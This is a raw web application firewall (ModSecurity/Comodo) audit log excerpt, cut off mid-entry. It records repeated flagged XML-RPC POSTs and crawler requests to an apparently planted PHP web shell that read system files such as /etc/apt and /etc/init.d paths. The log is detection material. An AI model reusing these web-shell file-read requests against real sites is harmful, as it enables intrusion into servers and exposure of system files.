(CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCuheTJOk1gXj_qIh4aOQAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750118021834302 1042876 (- - -) Stopwatch2: 1750118021834302 1042876; combined=3835, p1=387, p2=2910, p3=128, p4=40, p5=221, sr=100, sw=149, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --80cd9d4f-Z-- --57ab544d-A-- [17/Jun/2025:05:24:28.493575 +0530] aFCutGj9J38fG6WAr4pabAAAAAk 52.204.89.12 37250 127.0.0.1 7081 --57ab544d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/apt/apt.conf.d&viewfile=//etc/apt/apt.conf.d/15update-stamp HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.204.89.12 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --57ab544d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3046 Connection: close Content-Type: text/html; charset=UTF-8 --57ab544d-H-- Message: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:path: /etc/apt/apt.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:viewfile: /etc/apt/apt.conf.d/15update-stamp"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:path: /etc/apt/apt.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCutGj9J38fG6WAr4pabAAAAAk"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:viewfile: /etc/apt/apt.conf.d/15update-stamp"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCutGj9J38fG6WAr4pabAAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750118068489520 4108 (- - -) Stopwatch2: 1750118068489520 4108; combined=2221, p1=361, p2=1711, p3=34, p4=33, p5=82, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --57ab544d-Z-- --c22ecc0c-A-- [17/Jun/2025:05:24:42.620840 +0530] aFCuwRXnhE9cEv89BPm34QAAAAc 146.190.105.35 40320 127.0.0.1 7081 --c22ecc0c-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 Cookie: PHPSESSID=lo10jcnu5l7qrd37fq88tlnso0; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_e8b0a5c2a3c126face923bf35ecfaa%7C%7C1750290881%7C%7C1750287281%7C%7C0c3122ca7d0544d13a66e385517d67d3; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=3f206faeebcebacbb0e2628e5c0c5a5e%7C%7C1750290881%7C%7C1750287281%7C%7C9aa250cea293146ec42ed633ba713e34 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --c22ecc0c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=lgb4qo52h8nldu285d4s26l4fl; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_0b74568dafff45ddd2a8a4ef2925ac%7C%7C1750290882%7C%7C1750287282%7C%7Ca71fe3fcafb242aee9242fa0b89de1f8; expires=Wed, 18 Jun 2025 23:54:42 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=1ef7252a8121cd4f031cf6fb15c065d2%7C%7C1750290882%7C%7C1750287282%7C%7C83b621a31f219835b74bd66c10e1b0eb; expires=Wed, 18 Jun 2025 23:54:42 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --c22ecc0c-E-- --c22ecc0c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCuwRXnhE9cEv89BPm34QAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750118081572349 1048581 (- - -) Stopwatch2: 1750118081572349 1048581; combined=3011, p1=419, p2=2174, p3=133, p4=35, p5=156, sr=113, sw=94, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c22ecc0c-Z-- --d26b5607-A-- [17/Jun/2025:05:25:43.168910 +0530] aFCu_hXnhE9cEv89BPm4CgAAAAc 146.190.105.35 38234 127.0.0.1 7081 --d26b5607-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 Cookie: PHPSESSID=oo7lhmc5vcs43kcfq637vt9fi2; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_3834c1832f3e7657855030e14072f6%7C%7C1750290941%7C%7C1750287341%7C%7C04ec50977f1096b77bd366ddcec40bb8; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=db0ae90dbf389d0cc7db5ad4e49b38bb%7C%7C1750290941%7C%7C1750287341%7C%7Cf7dfcebe64d07dd23c17d6448c6f56bb User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --d26b5607-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=l7nt5f29ipf81mi3ghjmur58ca; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_ab693f123736442e23a7c9c252efb8%7C%7C1750290942%7C%7C1750287342%7C%7Cc74198e51872b6d31181a65636a923d3; expires=Wed, 18 Jun 2025 23:55:42 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=0d11f9cf5148454c1d3cc57d3e870184%7C%7C1750290943%7C%7C1750287343%7C%7C13e1c5fc4ba419dd6b34221f9ee3b0a2; expires=Wed, 18 Jun 2025 23:55:43 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --d26b5607-E-- --d26b5607-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCu_hXnhE9cEv89BPm4CgAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750118142102145 1066851 (- - -) Stopwatch2: 1750118142102145 1066851; combined=2803, p1=406, p2=2007, p3=100, p4=35, p5=159, sr=119, sw=96, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d26b5607-Z-- --252d0739-A-- [17/Jun/2025:05:26:43.595354 +0530] aFCvOlJfblPUQiSn5r2UhgAAAAA 146.190.105.35 55808 127.0.0.1 7081 --252d0739-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 Cookie: PHPSESSID=fc6clmanc94edfl7m4ha80n1km; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_d1b47cd8f7f2cb8886c2efc4aff28d%7C%7C1750291002%7C%7C1750287402%7C%7Ca29e7f2483ec4282c3bb282031e5e972; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=782b91294007d4a5110f654c6690570f%7C%7C1750291002%7C%7C1750287402%7C%7C0afa81904388dc61f8caa11af87d5b2a User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --252d0739-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=a18sudgg5ms0j2it88jjthp6rb; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_db32f0e347ad8c04a7cb3fd8182711%7C%7C1750291003%7C%7C1750287403%7C%7C4b94b6aa7c92b9f8847eda1cc3675f02; expires=Wed, 18 Jun 2025 23:56:43 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=942de0f0822e1977aadc37024b392e8e%7C%7C1750291003%7C%7C1750287403%7C%7C156d931c03ea478fe4aaaa8edc4f0af2; expires=Wed, 18 Jun 2025 23:56:43 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --252d0739-E-- --252d0739-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCvOlJfblPUQiSn5r2UhgAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750118202570245 1025200 (- - -) Stopwatch2: 1750118202570245 1025200; combined=3232, p1=373, p2=2454, p3=104, p4=40, p5=164, sr=91, sw=97, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --252d0739-Z-- --0cac841c-A-- [17/Jun/2025:05:27:43.708129 +0530] aFCvdooVQnPDyHnl9oPWpQAAAAY 146.190.105.35 53654 127.0.0.1 7081 --0cac841c-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 497 Cookie: PHPSESSID=u70d1l7ddn2uge8niah80ueeh1; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_ea036ddca59bdd96c464f57e83d2b8%7C%7C1750291062%7C%7C1750287462%7C%7C072878f698d0b343e641827d844e5c60; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=c9008a56d1ef36a6f9ec0a521e8e37fa%7C%7C1750291062%7C%7C1750287462%7C%7Cca718a436158ed46144acf303a111b76 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --0cac841c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=jsnuk07cksm5mq651fnocgsrk5; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_264df0ca0da5c11fd9d3a8c3e6c0af%7C%7C1750291063%7C%7C1750287463%7C%7C5ae10ad8da95ab1373b49f79de7cf465; expires=Wed, 18 Jun 2025 23:57:43 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=84b601ee0b9707d21d0ba7c773188113%7C%7C1750291063%7C%7C1750287463%7C%7Ce43e3701ad2f7b13d591b6e07bbd1030; expires=Wed, 18 Jun 2025 23:57:43 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --0cac841c-E-- --0cac841c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCvdooVQnPDyHnl9oPWpQAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750118262613541 1094725 (- - -) Stopwatch2: 1750118262613541 1094725; combined=3445, p1=440, p2=2470, p3=126, p4=47, p5=225, sr=119, sw=137, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0cac841c-Z-- --452f1e09-A-- [17/Jun/2025:05:27:55.440967 +0530] aFCvgwJ4p5Cdblnjra567QAAAAI 216.73.216.240 59290 127.0.0.1 7081 --452f1e09-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d%2Frsync HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --452f1e09-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4495 Connection: close Content-Type: text/html; charset=UTF-8 --452f1e09-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/rsync"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCvgwJ4p5Cdblnjra567QAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/rsync"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCvgwJ4p5Cdblnjra567QAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750118275436889 4140 (- - -) Stopwatch2: 1750118275436889 4140; combined=2072, p1=341, p2=1581, p3=36, p4=30, p5=84, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --452f1e09-Z-- --cca51e1f-A-- [17/Jun/2025:05:28:44.200912 +0530] aFCvs1CTF37l_jAzt4oWDQAAAAU 146.190.105.35 49310 127.0.0.1 7081 --cca51e1f-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=6hm4ij2igfagqsc0dtdt4dqk0r; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_d4f963f8291aef6e2d9a1a55b44a73%7C%7C1750291122%7C%7C1750287522%7C%7C8ff21230ca5ddbcfdc75edaa85ee0b19; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=85381dd12fd25a8b382a698ef9f77f81%7C%7C1750291122%7C%7C1750287522%7C%7Ca7ee8989e76a42a50efdffadd667e6cb User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --cca51e1f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=5l63cvt5d4lrsaeespv9gee8s3; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_dafcc58f97af38596f1d26bab1f7e7%7C%7C1750291123%7C%7C1750287523%7C%7C5aac768a23f9817dd39677db6eb56a9d; expires=Wed, 18 Jun 2025 23:58:43 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=cbf5735b79b87ef217487cf50b640671%7C%7C1750291124%7C%7C1750287524%7C%7C78dc612ca759e6689c4a0971f8289a6d; expires=Wed, 18 Jun 2025 23:58:44 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --cca51e1f-E-- --cca51e1f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCvs1CTF37l_jAzt4oWDQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750118323108485 1092516 (- - -) Stopwatch2: 1750118323108485 1092516; combined=3098, p1=401, p2=2261, p3=124, p4=36, p5=179, sr=95, sw=97, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cca51e1f-Z-- --0552c17a-A-- [17/Jun/2025:05:29:05.073765 +0530] aFCvyX4j6VFpohzeqUMPHwAAAAo 216.73.216.240 55556 127.0.0.1 7081 --0552c17a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d%2Fmariadb HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --0552c17a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 5796 Connection: close Content-Type: text/html; charset=UTF-8 --0552c17a-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/mariadb"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCvyX4j6VFpohzeqUMPHwAAAAo"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/mariadb"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCvyX4j6VFpohzeqUMPHwAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750118345068916 4927 (- - -) Stopwatch2: 1750118345068916 4927; combined=2534, p1=338, p2=2004, p3=45, p4=34, p5=113, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0552c17a-Z-- --1ec91914-A-- [17/Jun/2025:05:29:44.260908 +0530] aFCv71CTF37l_jAzt4oWQAAAAAU 146.190.105.35 32884 127.0.0.1 7081 --1ec91914-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=fq80nml8ut6ru3v57ar9pj5831; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_8cbf07e4974518a252b9397ffc80ef%7C%7C1750291182%7C%7C1750287582%7C%7C827d1bbbe9e0c31b25f9fa66b20cfbc1; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=652831d4948812a806e0fbe537ad3991%7C%7C1750291182%7C%7C1750287582%7C%7C1683a66e6730253100e72bf902b0ff05 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --1ec91914-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 